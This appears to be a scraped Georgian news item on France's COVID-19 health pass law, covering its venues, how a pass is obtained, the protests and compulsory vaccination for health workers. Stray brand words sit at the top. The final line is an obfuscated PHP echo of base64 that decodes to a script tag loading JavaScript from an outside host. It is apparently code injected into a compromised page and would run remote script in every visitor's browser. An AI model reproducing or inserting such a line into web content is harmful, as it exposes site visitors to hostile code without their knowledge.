celsiusi
ავერსი საქკაბელი
საფრანგეთში 9 აგვისტოდან შევა ძალაში ახალი კანონი, რომლის თანახმადაც ე.წ "ჯანმრთელობის ცნობა - Health pass" სავალდებულო იქნება კაფეში და რესტორანში შესასვლელად, თვითმფრინავით  ან საქალაქთაშორისო მატარებლით მგზავრობისთვის. 
 
როგორც ნორვეგიის სამეფოს ჯანდაცვის სამინისტროს მრჩეველი ზაზა წერეთელი წერს, შაბათ -კვირას პარლამენტის მიერ მიღებულმა კანონმდებლობამ გამოიწვია მასობრივი საპროტესტო აქციები საფრანგეთში, მაგრამ მთავრობას გადაწყვეტილი აქვს ამ კანონის განხორციელება.
 
მისივე თქმით,  ჯანმრთელობის ეს ცნობა პასი წარმოიქმნება ან აღიარებული ვაქცინის ორი აცრის, უარყოფითი კორონავირუსული ტესტით ან ინფექციისგან გამოჯანმრთელების ცნობის საფუძველზე. კანონმდებლობით ასევე სავალდებულო გახდა ვაქცინაცია  ჯანმრთელობის მუშაკებისა და მომვლელებისთვის (ცვლილება შევიდა რომ სამსახურიდან ამის გამო არ გაგანთავისუფლებენ, თუმცა უხელფასოდ მოგიწევს მუშაობა). აი ასეთი მნიშვნელეობა აქვს ვაქცინაციას.
 
 
2596
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");